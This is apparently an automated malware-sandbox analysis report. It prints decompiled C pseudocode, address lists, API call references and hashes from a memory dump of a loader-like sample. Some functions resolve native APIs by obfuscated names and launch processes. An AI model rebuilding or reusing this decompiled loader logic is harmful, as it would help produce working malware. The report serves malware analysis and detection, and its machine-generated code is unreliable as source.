						if(_a12 != 0) {
							L21:
							E032950CA(_a4);
							if(_a20 == 0 || _a20 == 0x10d2) {
								goto L24;
							} else {
								goto L23;
							}
						}
						_a20 = _a20 & 0x00000000;
						goto L18;
					}
				}
			}

0x032946d1
0x032946d1
0x032946d1
0x032946da
0x032946df
0x032946e6
0x032946e8
0x032946e8
0x032946f5
0x03294700
0x03294703
0x0329470e
0x03294711
0x03294716
0x03294719
0x0329471e
0x03294721
0x0329472d
0x0329473a
0x0329473c
0x03294742
0x03294747
0x03294752
0x03294754
0x03294757
0x0329475d
0x0329475f
0x03294767
0x03294772
0x03294774
0x03294777
0x03294777
0x03294779
0x03294780
0x03294785
0x03294792
0x03294794
0x03294799
0x032947a1
0x032947a4
0x032947aa
0x032947b5
0x032947b7
0x032947bc
0x032947c1
0x032947c4
0x032947c9
0x032947d4
0x032947d6
0x032947d9
0x032947d9
0x032947db
0x032947e2
0x032947e5
0x032947ea
0x032947f4
0x032947f6
0x032947f6
0x032947f9
0x03294807
0x0329480c
0x03294810
0x03294813
0x032949dd
0x032949e5
0x032949f2
0x03294819
0x03294825
0x0329482d
0x03294830
0x032949cd
0x032949d7
0x00000000
0x032949d7
0x0329483c
0x03294841
0x0329484a
0x0329485b
0x0329485f
0x03294868
0x0329486e
0x0329487b
0x03294882
0x0329488b
0x03294891
0x032949bd
0x032949c7
0x00000000
0x032949c7
0x0329489d
0x032948a3
0x032948a4
0x032948ab
0x032948ae
0x032949af
0x032949b7
0x00000000
0x032949b7
0x032948b7
0x032948bd
0x032948c6
0x032948cf
0x032948da
0x032948e1
0x032948e4
0x032949f5
0x03294997
0x03294997
0x0329499c
0x032949a7
0x032949ad
0x00000000
0x032949ad
0x032948ee
0x032948f5
0x032948f8
0x032948fd
0x0329490d
0x03294910
0x03294916
0x0329491c
0x03294922
0x03294925
0x0329492b
0x0329492e
0x03294933
0x03294937
0x03294937
0x03294943
0x0329494f
0x03294953
0x03294955
0x0329495a
0x0329495c
0x03294961
0x03294966
0x03294973
0x0329497b
0x0329497e
0x0329497e
0x0329495a
0x00000000
0x03294945
0x03294949
0x03294980
0x03294983
0x0329498c
0x00000000
0x00000000
0x00000000
0x00000000
0x0329498c
0x0329494b
0x00000000
0x0329494b
0x03294943

APIs

GetTickCount.KERNEL32 ref: 032946E8
wsprintfA.USER32 ref: 03294735
wsprintfA.USER32 ref: 03294752
wsprintfA.USER32 ref: 03294772
wsprintfA.USER32 ref: 03294790
wsprintfA.USER32 ref: 032947B3
wsprintfA.USER32 ref: 032947D4
wsprintfA.USER32 ref: 032947F4
RtlAllocateHeap.NTDLL(00000000,00000800), ref: 03294825
GetTickCount.KERNEL32 ref: 03294836
RtlEnterCriticalSection.NTDLL(053E95F0), ref: 0329484A
RtlLeaveCriticalSection.NTDLL(053E95F0), ref: 03294868

Part of subcall function 0329624D: lstrlen.KERNEL32(00000000,00000000,253D7325,00000000,00000000,?,00000000,032970D9,00000000,053E9630), ref: 03296278
Part of subcall function 0329624D: lstrlen.KERNEL32(00000000,?,00000000,032970D9,00000000,053E9630), ref: 03296280
Part of subcall function 0329624D: strcpy.NTDLL ref: 03296297
Part of subcall function 0329624D: lstrcat.KERNEL32(00000000,00000000), ref: 032962A2
Part of subcall function 0329624D: StrTrimA.SHLWAPI(00000000,=,00000000,00000000,032970D9,?,00000000,032970D9,00000000,053E9630), ref: 032962BF

StrTrimA.SHLWAPI(00000000,032992AC,?,053E9630), ref: 0329489D

Part of subcall function 032921C1: lstrlen.KERNEL32(053E87FA,00000000,00000000,00000000,03297100,00000000), ref: 032921D1
Part of subcall function 032921C1: lstrlen.KERNEL32(?), ref: 032921D9
Part of subcall function 032921C1: lstrcpy.KERNEL32(00000000,053E87FA), ref: 032921ED
Part of subcall function 032921C1: lstrcat.KERNEL32(00000000,?), ref: 032921F8

lstrcpy.KERNEL32(00000000,?), ref: 032948BD
lstrcat.KERNEL32(00000000,?), ref: 032948CF
lstrcat.KERNEL32(00000000,00000000), ref: 032948D5

Part of subcall function 03294AA6: lstrlen.KERNEL32(?,00000000,053E9C98,7742C740,032913D0,053E9E9D,032955DE,032955DE,?,032955DE,?,63699BC3,E8FA7DD7,00000000), ref: 03294AAD
Part of subcall function 03294AA6: mbstowcs.NTDLL ref: 03294AD6
Part of subcall function 03294AA6: memset.NTDLL ref: 03294AE8

wcstombs.NTDLL ref: 03294966

Part of subcall function 0329161A: SysAllocString.OLEAUT32(00000000), ref: 0329165B

Part of subcall function 032950CA: HeapFree.KERNEL32(00000000,00000000,03294239,00000000,00000001,?,00000000,?,?,?,03296B8D,00000000,?,00000001), ref: 032950D6

HeapFree.KERNEL32(00000000,?,00000000), ref: 032949A7
HeapFree.KERNEL32(00000000,00000000,00000000), ref: 032949B7
HeapFree.KERNEL32(00000000,00000000,?,053E9630), ref: 032949C7
HeapFree.KERNEL32(00000000,?), ref: 032949D7
HeapFree.KERNEL32(00000000,?), ref: 032949E5

Strings

;j)D, xrefs: 032946F5

Memory Dump Source

Source File: 00000007.00000002.481311716.0000000003291000.00000020.00000001.sdmp, Offset: 03290000, based on PE: true

Associated: 00000007.00000002.481294536.0000000003290000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.481340469.0000000003299000.00000002.00000001.sdmp Download File
Associated: 00000007.00000002.481359865.000000000329A000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.481378438.000000000329C000.00000002.00000001.sdmp Download File

Similarity

API ID: Heapwsprintf$Free$lstrlen$lstrcat$CountCriticalSectionTickTrimlstrcpy$AllocAllocateEnterLeaveStringmbstowcsmemsetstrcpywcstombs
String ID: ;j)D
API String ID: 972889839-1993995304
Opcode ID: d33cdc173c74778f15911978b50271198566a0882ebf4aa0f8bf1ac8b80687e9
Instruction ID: 7be6079c69e879f8e137a016ec5e2421ad139649ee7b56039036ca14ffc09cb3
Opcode Fuzzy Hash: d33cdc173c74778f15911978b50271198566a0882ebf4aa0f8bf1ac8b80687e9
Instruction Fuzzy Hash: 32A15C71900209EFEF11EF69EC88E9A3BA9FF49310B158027F908CB254D775D991CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 03295927, Relevance: 13.6, APIs: 9, Instructions: 112
stringCOMMON

Download Yara Rule

C-Code - Quality: 27%

			E03295927(intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, intOrPtr* _a16, intOrPtr* _a20) {
				intOrPtr _v8;
				intOrPtr _v12;
				long _v16;
				intOrPtr _v20;
				signed int _v24;
				void* __esi;
				long _t43;
				intOrPtr _t44;
				intOrPtr _t46;
				void* _t48;
				void* _t49;
				void* _t50;
				intOrPtr _t54;
				intOrPtr _t57;
				void* _t58;
				void* _t59;
				void* _t60;
				intOrPtr _t66;
				void* _t71;
				void* _t74;
				intOrPtr _t75;
				void* _t77;
				intOrPtr _t79;
				intOrPtr* _t80;
				intOrPtr _t91;

				_t79 =  *0x329a38c; // 0x53e9ba0
				_v24 = 8;
				_t43 = GetTickCount();
				_push(5);
				_t74 = 0xa;
				_v16 = _t43;
				_t44 = E03294E1B(_t74,  &_v16);
				_v8 = _t44;
				if(_t44 == 0) {
					_v8 = 0x32991ac;
				}
				_t46 = E032942F0(_t79);
				_v12 = _t46;
				if(_t46 != 0) {
					_t80 = __imp__;
					_t48 =  *_t80(_v8, _t71);
					_t49 =  *_t80(_v12);
					_t50 =  *_t80(_a4);
					_t54 = E03296837(lstrlenW(_a8) + _t48 + _t48 + _t49 + _t50 + lstrlenW(_a8) + _t48 + _t48 + _t49 + _t50 + 0x102);
					_v20 = _t54;
					if(_t54 != 0) {
						_t75 =  *0x329a2d4; // 0x214d5a8
						_t16 = _t75 + 0x329baa8; // 0x530025
						 *0x329a138(_t54, _t16, _v8, _v8, _a4, _v12, _a8);
						_push(4);
						_t77 = 5;
						_t57 = E03294E1B(_t77,  &_v16);
						_v8 = _t57;
						if(_t57 == 0) {
							_v8 = 0x32991b0;
						}
						_t58 =  *_t80(_v8);
						_t59 =  *_t80(_v12);
						_t60 =  *_t80(_a4);
						_t91 = E03296837(lstrlenW(_a12) + _t58 + _t58 + _t59 + _t60 + lstrlenW(_a12) + _t58 + _t58 + _t59 + _t60 + 0x13a);
						if(_t91 == 0) {
							E032950CA(_v20);
						} else {
							_t66 =  *0x329a2d4; // 0x214d5a8
							_t31 = _t66 + 0x329bbc8; // 0x73006d
							 *0x329a138(_t91, _t31, _v8, _v8, _a4, _v12, _a12);
							 *_a16 = _v20;
							_v24 = _v24 & 0x00000000;
							 *_a20 = _t91;
						}
					}
					E032950CA(_v12);
				}
				return _v24;
			}

0x0329592f
0x03295935
0x0329593c
0x03295942
0x03295946
0x0329594a
0x0329594d
0x03295954
0x03295957
0x03295959
0x03295959
0x03295962
0x03295969
0x0329596c
0x03295972
0x0329597c
0x03295985
0x0329598c
0x032959a5
0x032959ac
0x032959af
0x032959b8
0x032959c1
0x032959d2
0x032959db
0x032959df
0x032959e3
0x032959ea
0x032959ed
0x032959ef
0x032959ef
0x032959f9
0x03295a02
0x03295a09
0x03295a21
0x03295a25
0x03295a62
0x03295a27
0x03295a2a
0x03295a32
0x03295a43
0x03295a4f
0x03295a57
0x03295a5b
0x03295a5b
0x03295a25
0x03295a6a
0x03295a6f
0x03295a76

APIs

GetTickCount.KERNEL32 ref: 0329593C
lstrlen.KERNEL32(?,80000002,00000005), ref: 0329597C
lstrlen.KERNEL32(00000000), ref: 03295985
lstrlen.KERNEL32(00000000), ref: 0329598C
lstrlenW.KERNEL32(80000002), ref: 03295999
lstrlen.KERNEL32(?,00000004), ref: 032959F9
lstrlen.KERNEL32(?), ref: 03295A02
lstrlen.KERNEL32(?), ref: 03295A09
lstrlenW.KERNEL32(?), ref: 03295A10

Part of subcall function 032950CA: HeapFree.KERNEL32(00000000,00000000,03294239,00000000,00000001,?,00000000,?,?,?,03296B8D,00000000,?,00000001), ref: 032950D6

Memory Dump Source

Source File: 00000007.00000002.481311716.0000000003291000.00000020.00000001.sdmp, Offset: 03290000, based on PE: true

Associated: 00000007.00000002.481294536.0000000003290000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.481340469.0000000003299000.00000002.00000001.sdmp Download File
Associated: 00000007.00000002.481359865.000000000329A000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.481378438.000000000329C000.00000002.00000001.sdmp Download File

Similarity

API ID: lstrlen$CountFreeHeapTick
String ID:
API String ID: 2535036572-0
Opcode ID: 6e321359a67230cebbf84d68d7d18423d38531b588660e4a5f6583c18d41f79b
Instruction ID: fc10de75db7742f41889c75b47ed22cf17d7170df60298452347b183883cefca
Opcode Fuzzy Hash: 6e321359a67230cebbf84d68d7d18423d38531b588660e4a5f6583c18d41f79b
Instruction Fuzzy Hash: 7A419A76D00209EFDF12EFA4DC0899EBBB5FF48314F154096ED04A7221D7368AA5DB90

Uniqueness

Uniqueness Score: -1.00%

Function 032951A8, Relevance: 13.6, APIs: 9, Instructions: 110
librarymemoryloaderCOMMON

Download Yara Rule

C-Code - Quality: 61%

			E032951A8(void* __eax, void* __ecx) {
				long _v8;
				void* _v12;
				void* _v16;
				void* _v28;
				long _v32;
				void _v104;
				char _v108;
				long _t39;
				intOrPtr _t43;
				intOrPtr _t50;
				void* _t52;
				intOrPtr _t53;
				void* _t61;
				intOrPtr* _t66;
				intOrPtr* _t73;
				intOrPtr* _t76;

				_t1 = __eax + 0x14; // 0x74183966
				_t71 =  *_t1;
				_t39 = E03294F5A(__ecx,  *((intOrPtr*)( *_t1 + 0xc)),  &_v12,  &_v16);
				_v8 = _t39;
				if(_t39 != 0) {
					L12:
					return _v8;
				}
				E032977A4( *((intOrPtr*)(_t71 + 0xc)),  *((intOrPtr*)(_t71 + 8)), _v12);
				_t43 = _v12(_v12);
				_v8 = _t43;
				if(_t43 == 0 && ( *0x329a2b8 & 0x00000001) != 0) {
					_v32 = 0;
					asm("stosd");
					asm("stosd");
					asm("stosd");
					_v108 = 0;
					memset( &_v104, 0, 0x40);
					_t50 =  *0x329a2d4; // 0x214d5a8
					_t18 = _t50 + 0x329b4a3; // 0x73797325
					_t52 = E03296343(_t18);
					_v12 = _t52;
					if(_t52 == 0) {
						_v8 = 8;
					} else {
						_t53 =  *0x329a2d4; // 0x214d5a8
						_t20 = _t53 + 0x329b770; // 0x53e8d18
						_t21 = _t53 + 0x329b0af; // 0x4e52454b
						_t66 = GetProcAddress(GetModuleHandleA(_t21), _t20);
						if(_t66 == 0) {
							_v8 = 0x7f;
						} else {
							_t73 = __imp__;
							_v108 = 0x44;
							 *_t73(0);
							_t61 =  *_t66(0, _v12, 0, 0, 0, 0x4000000, 0, 0,  &_v108,  &_v32);
							 *_t73(1);
							if(_t61 == 0) {
								_v8 = GetLastError();
							} else {
								CloseHandle(_v28);
								CloseHandle(_v32);
							}
						}
						HeapFree( *0x329a290, 0, _v12);
					}
				}
				_t76 = _v16;
				 *((intOrPtr*)(_t76 + 0x18))( *((intOrPtr*)(_t76 + 0x1c))( *_t76));
				E032950CA(_t76);
				goto L12;
			}

0x032951b1
0x032951b1
0x032951bf
0x032951c8
0x032951cb
0x032952dd
0x032952e4
0x032952e4
0x032951da
0x032951e2
0x032951e7
0x032951ea
0x032951ff
0x03295205
0x03295206
0x03295209
0x0329520f
0x03295212
0x03295217
0x0329521f
0x03295226
0x0329522d
0x03295230
0x032952c4
0x03295236
0x03295236
0x0329523b
0x03295242
0x03295256
0x0329525a
0x032952ab
0x0329525c
0x0329525c
0x03295263
0x0329526a
0x03295282
0x03295288
0x0329528c
0x032952a6
0x0329528e
0x03295297
0x0329529c
0x0329529c
0x0329528c
0x032952bc
0x032952bc
0x03295230
0x032952cb
0x032952d4
0x032952d8
0x00000000

APIs

Part of subcall function 03294F5A: GetModuleHandleA.KERNEL32(4C44544E,00000020,74183966,00000000,00000000,?,?,?,032951C4,?,?,?,?,00000000,00000000), ref: 03294F7F
Part of subcall function 03294F5A: GetProcAddress.KERNEL32(00000000,7243775A), ref: 03294FA1
Part of subcall function 03294F5A: GetProcAddress.KERNEL32(00000000,614D775A), ref: 03294FB7
Part of subcall function 03294F5A: GetProcAddress.KERNEL32(00000000,6E55775A), ref: 03294FCD
Part of subcall function 03294F5A: GetProcAddress.KERNEL32(00000000,4E6C7452), ref: 03294FE3
Part of subcall function 03294F5A: GetProcAddress.KERNEL32(00000000,6C43775A), ref: 03294FF9

memset.NTDLL ref: 03295212

Part of subcall function 03296343: ExpandEnvironmentStringsA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,0329522B,73797325), ref: 03296354
Part of subcall function 03296343: ExpandEnvironmentStringsA.KERNEL32(?,00000000,00000000,00000000), ref: 0329636E

GetModuleHandleA.KERNEL32(4E52454B,053E8D18,73797325), ref: 03295249
GetProcAddress.KERNEL32(00000000), ref: 03295250
Wow64EnableWow64FsRedirection.KERNEL32(00000000), ref: 0329526A
Wow64EnableWow64FsRedirection.KERNEL32(00000001), ref: 03295288
CloseHandle.KERNEL32(00000000), ref: 03295297
CloseHandle.KERNEL32(?), ref: 0329529C
GetLastError.KERNEL32 ref: 032952A0
HeapFree.KERNEL32(00000000,?), ref: 032952BC

Memory Dump Source

Source File: 00000007.00000002.481311716.0000000003291000.00000020.00000001.sdmp, Offset: 03290000, based on PE: true

Associated: 00000007.00000002.481294536.0000000003290000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.481340469.0000000003299000.00000002.00000001.sdmp Download File
Associated: 00000007.00000002.481359865.000000000329A000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.481378438.000000000329C000.00000002.00000001.sdmp Download File

Similarity

API ID: AddressProc$HandleWow64$CloseEnableEnvironmentExpandModuleRedirectionStrings$ErrorFreeHeapLastmemset
String ID:
API String ID: 91923200-0
Opcode ID: 52793a48c6c6f0b0cc213b6d867161716c6d67ed19b692ac08df9dada792dae5
Instruction ID: 506c04ba8cec9618407fcf34fea4f9677663ce5ac31d216879519d4a65dc8ec7
Opcode Fuzzy Hash: 52793a48c6c6f0b0cc213b6d867161716c6d67ed19b692ac08df9dada792dae5
Instruction Fuzzy Hash: 6F314A75910219EFDF11EBA4EC48ADEBFB8FF09310F218056E509EB110D775AA85CB90

Uniqueness

Uniqueness Score: -1.00%

Function 0329624D, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 68
stringCOMMON

Download Yara Rule

C-Code - Quality: 64%

			E0329624D(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
				intOrPtr _v8;
				intOrPtr _t9;
				intOrPtr _t13;
				char* _t28;
				void* _t33;
				void* _t34;
				char* _t36;
				void* _t38;
				intOrPtr* _t39;
				char* _t40;
				char* _t42;
				char* _t43;

				_t34 = __edx;
				_push(__ecx);
				_t9 =  *0x329a2d4; // 0x214d5a8
				_t1 = _t9 + 0x329b60c; // 0x253d7325
				_t36 = 0;
				_t28 = E0329278C(__ecx, _t1);
				if(_t28 != 0) {
					_t39 = __imp__;
					_t13 =  *_t39(_t28, _t38);
					_v8 = _t13;
					_t6 =  *_t39(_a4) + 1; // 0x53e9631
					_t40 = E03296837(_v8 + _t6);
					if(_t40 != 0) {
						strcpy(_t40, _t28);
						_pop(_t33);
						__imp__(_t40, _a4);
						_t36 = E032949FE(_t33, _t34, _t40, _a8);
						E032950CA(_t40);
						_t42 = E03297565(StrTrimA(_t36, "="), _t36);
						if(_t42 != 0) {
							E032950CA(_t36);
							_t36 = _t42;
						}
						_t43 = E032952E5(_t36, _t33);
						if(_t43 != 0) {
							E032950CA(_t36);
							_t36 = _t43;
						}
					}
					E032950CA(_t28);
				}
				return _t36;
			}

0x0329624d
0x03296250
0x03296251
0x03296258
0x0329625f
0x03296266
0x0329626a
0x03296271
0x03296278
0x0329627d
0x03296285
0x0329628f
0x03296293
0x03296297
0x0329629d
0x032962a2
0x032962b2
0x032962b4
0x032962cb
0x032962cf
0x032962d2
0x032962d7
0x032962d7
0x032962e0
0x032962e4
0x032962e7
0x032962ec
0x032962ec
0x032962e4
0x032962ef
0x032962f4
0x032962fa

APIs

Part of subcall function 0329278C: lstrlen.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,03296266,253D7325,00000000,00000000,?,00000000,032970D9), ref: 032927F3
Part of subcall function 0329278C: sprintf.NTDLL ref: 03292814

lstrlen.KERNEL32(00000000,00000000,253D7325,00000000,00000000,?,00000000,032970D9,00000000,053E9630), ref: 03296278
lstrlen.KERNEL32(00000000,?,00000000,032970D9,00000000,053E9630), ref: 03296280

Part of subcall function 03296837: RtlAllocateHeap.NTDLL(00000000,00000000,03294197), ref: 03296843

strcpy.NTDLL ref: 03296297
lstrcat.KERNEL32(00000000,00000000), ref: 032962A2

Part of subcall function 032949FE: lstrlen.KERNEL32(00000000,00000000,032970D9,00000000,?,032962B1,00000000,032970D9,?,00000000,032970D9,00000000,053E9630), ref: 03294A0F

Part of subcall function 032950CA: HeapFree.KERNEL32(00000000,00000000,03294239,00000000,00000001,?,00000000,?,?,?,03296B8D,00000000,?,00000001), ref: 032950D6

StrTrimA.SHLWAPI(00000000,=,00000000,00000000,032970D9,?,00000000,032970D9,00000000,053E9630), ref: 032962BF

Part of subcall function 03297565: lstrlen.KERNEL32(00000000,00000000,00000000,00000000,?,032962CB,00000000,?,00000000,032970D9,00000000,053E9630), ref: 0329756F
Part of subcall function 03297565: _snprintf.NTDLL ref: 032975CD

Strings

=, xrefs: 032962B9

Memory Dump Source

Source File: 00000007.00000002.481311716.0000000003291000.00000020.00000001.sdmp, Offset: 03290000, based on PE: true

Associated: 00000007.00000002.481294536.0000000003290000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.481340469.0000000003299000.00000002.00000001.sdmp Download File
Associated: 00000007.00000002.481359865.000000000329A000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.481378438.000000000329C000.00000002.00000001.sdmp Download File

Similarity

API ID: lstrlen$Heap$AllocateFreeTrim_snprintflstrcatsprintfstrcpy
String ID: =
API String ID: 2864389247-1428090586
Opcode ID: 2e9c4593bde6bc237247e7ade7e1d916ee93368f8134d544c627f7cd70aa182a
Instruction ID: 677acc2e2199ebc42ebd0b3479b7b57b109c85f169bd6535b21d78f3330f602c
Opcode Fuzzy Hash: 2e9c4593bde6bc237247e7ade7e1d916ee93368f8134d544c627f7cd70aa182a
Instruction Fuzzy Hash: 1B11A73BA21325776F12F7A89C44C6E36ADAE4A5203194127F900EF100DFB4C88687E0

Uniqueness

Uniqueness Score: -1.00%

Function 02F4EE50, Relevance: 9.2, APIs: 6, Instructions: 240COMMON

Download Yara Rule

APIs

getSystemCP.LIBCMTD ref: 02F4EE65

Part of subcall function 02F4ED40: GetOEMCP.KERNEL32(00000000,02F831E0,02F63658,000000FF,?,02F4EB06,?), ref: 02F4ED99
Part of subcall function 02F4ED40: _LocaleUpdate::~_LocaleUpdate.LIBCMTD ref: 02F4EDAC

setSBCS.LIBCMTD ref: 02F4EE7A
setSBUpLow.LIBCMTD ref: 02F4EFD6

Memory Dump Source

Source File: 00000007.00000002.480637946.0000000002F1E000.00000020.00020000.sdmp, Offset: 02F1E000, based on PE: false

Similarity

API ID: Locale$SystemUpdateUpdate::~_
String ID:
API String ID: 2101441384-0
Opcode ID: 336b529ed57059dac4ea154085d22a1fdcb83a314fb67a8e61e666e07b93532d
Instruction ID: d36f4d6912ebb8cf66597d95fed54f762bfc8a0caca28f3302da50f18e179370
Opcode Fuzzy Hash: 336b529ed57059dac4ea154085d22a1fdcb83a314fb67a8e61e666e07b93532d
Instruction Fuzzy Hash: 93B13975E04119DFDB04CF98C840AAEBBB1BF84354F14C69AE92A5B341DBB1EA45CF90

Uniqueness

Uniqueness Score: -1.00%

Function 03292902, Relevance: 9.1, APIs: 6, Instructions: 120memoryCOMMON

Download Yara Rule

APIs

SysAllocString.OLEAUT32(?), ref: 0329295E
SysAllocString.OLEAUT32(0070006F), ref: 03292972
SysAllocString.OLEAUT32(00000000), ref: 03292984
SysFreeString.OLEAUT32(00000000), ref: 032929E8
SysFreeString.OLEAUT32(00000000), ref: 032929F7
SysFreeString.OLEAUT32(00000000), ref: 03292A02

Memory Dump Source

Source File: 00000007.00000002.481311716.0000000003291000.00000020.00000001.sdmp, Offset: 03290000, based on PE: true

Associated: 00000007.00000002.481294536.0000000003290000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.481340469.0000000003299000.00000002.00000001.sdmp Download File
Associated: 00000007.00000002.481359865.000000000329A000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.481378438.000000000329C000.00000002.00000001.sdmp Download File

Similarity

API ID: String$AllocFree
String ID:
API String ID: 344208780-0
Opcode ID: e1291c1b7e0ec5dcf202ad9829903df83f66c0e247a1228f9e330ffe23489a6d
Instruction ID: 0dfab38243ff1e2255552f0ad00f938d25d19c8ec2e29d8e4d7c951680eb88c3
Opcode Fuzzy Hash: e1291c1b7e0ec5dcf202ad9829903df83f66c0e247a1228f9e330ffe23489a6d
Instruction Fuzzy Hash: 4F314F32D10609EFEF01EFB8D84869EB7B9AF49311F154426ED10EB110DB71A945CB91

Uniqueness

Uniqueness Score: -1.00%

Function 03294F5A, Relevance: 9.1, APIs: 6, Instructions: 81
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E03294F5A(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12) {
				intOrPtr _v8;
				intOrPtr _t23;
				intOrPtr _t26;
				_Unknown_base(*)()* _t28;
				intOrPtr _t30;
				_Unknown_base(*)()* _t32;
				intOrPtr _t33;
				_Unknown_base(*)()* _t35;
				intOrPtr _t36;
				_Unknown_base(*)()* _t38;
				intOrPtr _t39;
				_Unknown_base(*)()* _t41;
				intOrPtr _t44;
				struct HINSTANCE__* _t48;
				intOrPtr _t54;

				_t54 = E03296837(0x20);
				if(_t54 == 0) {
					_v8 = 8;
				} else {
					_t23 =  *0x329a2d4; // 0x214d5a8
					_t1 = _t23 + 0x329b11a; // 0x4c44544e
					_t48 = GetModuleHandleA(_t1);
					_t26 =  *0x329a2d4; // 0x214d5a8
					_t2 = _t26 + 0x329b792; // 0x7243775a
					_v8 = 0x7f;
					_t28 = GetProcAddress(_t48, _t2);
					 *(_t54 + 0xc) = _t28;
					if(_t28 == 0) {
						L8:
						E032950CA(_t54);
					} else {
						_t30 =  *0x329a2d4; // 0x214d5a8
						_t5 = _t30 + 0x329b77f; // 0x614d775a
						_t32 = GetProcAddress(_t48, _t5);
						 *(_t54 + 0x10) = _t32;
						if(_t32 == 0) {
							goto L8;
						} else {
							_t33 =  *0x329a2d4; // 0x214d5a8
							_t7 = _t33 + 0x329b74e; // 0x6e55775a
							_t35 = GetProcAddress(_t48, _t7);
							 *(_t54 + 0x14) = _t35;
							if(_t35 == 0) {
								goto L8;
							} else {
								_t36 =  *0x329a2d4; // 0x214d5a8
								_t9 = _t36 + 0x329b72e; // 0x4e6c7452
								_t38 = GetProcAddress(_t48, _t9);
								 *(_t54 + 0x18) = _t38;
								if(_t38 == 0) {
									goto L8;
								} else {
									_t39 =  *0x329a2d4; // 0x214d5a8
									_t11 = _t39 + 0x329b7a2; // 0x6c43775a
									_t41 = GetProcAddress(_t48, _t11);
									 *(_t54 + 0x1c) = _t41;
									if(_t41 == 0) {
										goto L8;
									} else {
										 *((intOrPtr*)(_t54 + 4)) = _a4;
										 *((intOrPtr*)(_t54 + 8)) = 0x40;
										_t44 = E03294248(_t54, _a8);
										_v8 = _t44;
										if(_t44 != 0) {
											goto L8;
										} else {
											 *_a12 = _t54;
										}
									}
								}
							}
						}
					}
				}
				return _v8;
			}

0x03294f69
0x03294f6d
0x0329502f
0x03294f73
0x03294f73
0x03294f78
0x03294f8b
0x03294f8d
0x03294f92
0x03294f9a
0x03294fa1
0x03294fa5
0x03294fa8
0x03295027
0x03295028
0x03294faa
0x03294faa
0x03294faf
0x03294fb7
0x03294fbb
0x03294fbe
0x00000000
0x03294fc0
0x03294fc0
0x03294fc5
0x03294fcd
0x03294fd1
0x03294fd4
0x00000000
0x03294fd6
0x03294fd6
0x03294fdb
0x03294fe3
0x03294fe7
0x03294fea
0x00000000
0x03294fec
0x03294fec
0x03294ff1
0x03294ff9
0x03294ffd
0x03295000
0x00000000
0x03295002
0x03295008
0x0329500d
0x03295014
0x0329501b
0x0329501e
0x00000000
0x03295020
0x03295023
0x03295023
0x0329501e
0x03295000
0x03294fea
0x03294fd4
0x03294fbe
0x03294fa8
0x0329503d

APIs

Part of subcall function 03296837: RtlAllocateHeap.NTDLL(00000000,00000000,03294197), ref: 03296843

GetModuleHandleA.KERNEL32(4C44544E,00000020,74183966,00000000,00000000,?,?,?,032951C4,?,?,?,?,00000000,00000000), ref: 03294F7F
GetProcAddress.KERNEL32(00000000,7243775A), ref: 03294FA1
GetProcAddress.KERNEL32(00000000,614D775A), ref: 03294FB7
GetProcAddress.KERNEL32(00000000,6E55775A), ref: 03294FCD
GetProcAddress.KERNEL32(00000000,4E6C7452), ref: 03294FE3
GetProcAddress.KERNEL32(00000000,6C43775A), ref: 03294FF9

Part of subcall function 03294248: memset.NTDLL ref: 032942C7

Memory Dump Source

Source File: 00000007.00000002.481311716.0000000003291000.00000020.00000001.sdmp, Offset: 03290000, based on PE: true

Associated: 00000007.00000002.481294536.0000000003290000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.481340469.0000000003299000.00000002.00000001.sdmp Download File
Associated: 00000007.00000002.481359865.000000000329A000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.481378438.000000000329C000.00000002.00000001.sdmp Download File

Similarity

API ID: AddressProc$AllocateHandleHeapModulememset
String ID:
API String ID: 1886625739-0
Opcode ID: 8a556bdd48d45cba37bacd26336a09e97b30bc2276fb66f600675b6a3148fcc8
Instruction ID: 49d3a677fcc4bac5206d0bfa7378d14220a81feb1a440a8d6c584b4d6a425a8a
Opcode Fuzzy Hash: 8a556bdd48d45cba37bacd26336a09e97b30bc2276fb66f600675b6a3148fcc8
Instruction Fuzzy Hash: 892191B1A1034BAFEB50EF69EC44E6A77ECEF09244B164117E409CB201E375E941CF60

Uniqueness

Uniqueness Score: -1.00%

Function 02F5CEB0, Relevance: 9.1, APIs: 6, Instructions: 75COMMON

Download Yara Rule

APIs

___initconout.LIBCMTD ref: 02F5CED2

Part of subcall function 02F61470: CreateFileA.KERNEL32(02F80900,40000000,00000003,00000000,00000003,00000000,00000000,?,02F5CED7,?,?,?,02F57436,?), ref: 02F61487

GetConsoleOutputCP.KERNEL32(00000000,02F57436,00000001,?,00000005,00000000,00000000,?,?,?,02F57436,?), ref: 02F5CF55
WideCharToMultiByte.KERNEL32(00000000,?,?,?,02F57436,?), ref: 02F5CF5C
WriteConsoleA.KERNEL32(02F841C8,?,02F57436,?,00000000,?,?,?,02F57436,?), ref: 02F5CF83

Memory Dump Source

Source File: 00000007.00000002.480637946.0000000002F1E000.00000020.00020000.sdmp, Offset: 02F1E000, based on PE: false

Similarity

API ID: Console$ByteCharCreateFileMultiOutputWideWrite___initconout
String ID:
API String ID: 3432720595-0
Opcode ID: 4320a034244d366257016cde740b89112121c466bede3b53a3b9649e38f4debe
Instruction ID: b0f0faf0625bc852884a96addf6e26516e178cfd3bc7451bcfe4b01a16d1f4f9
Opcode Fuzzy Hash: 4320a034244d366257016cde740b89112121c466bede3b53a3b9649e38f4debe
Instruction Fuzzy Hash: 46219131E4031EEEDB20DBA0ED48BBAB7B4EB05BD5F10062AEB169A0C0D7754154CB66

Uniqueness

Uniqueness Score: -1.00%

Function 02F85588, Relevance: 9.0, APIs: 2, Strings: 3, Instructions: 228COMMON

Download Yara Rule

APIs

GetEnvironmentVariableA.KERNEL32(02F7A680,02F84200,00000718), ref: 02F85709
